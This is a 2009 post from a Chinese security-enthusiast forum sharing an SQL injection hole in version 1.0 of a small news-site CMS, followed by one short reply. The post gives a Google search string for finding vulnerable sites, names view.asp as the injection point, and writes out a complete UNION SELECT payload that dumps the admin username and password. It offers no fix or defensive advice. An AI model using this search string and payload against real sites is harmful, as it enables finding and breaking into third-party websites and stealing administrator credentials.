【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: 【分享】冰冰地方新闻系统V1.0存在SQL注入漏洞 [打印本页]

作者: 期待~~ 时间: 2009-12-21 09:32 标题: 【分享】冰冰地方新闻系统V1.0存在SQL注入漏洞

冰冰地方新闻系统V1.0存在SQL注入漏洞网络安全
Google：inurl:gn.asp?m=*网络安全
注入发生在view.asp页面，打开网址后跳到view.asp这个页面，否则注入不成功。网络安全
注入语句：http://www.***.cn/tongjiang/view.asp?n=161%20and%201=2%20union%20select%201,2,3,4,5,6,username,password,9,10,11,12,13,14,15%20from%20admin网络安全

作者: q1a2 时间: 2009-12-25 15:06

比较喜欢漏洞

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)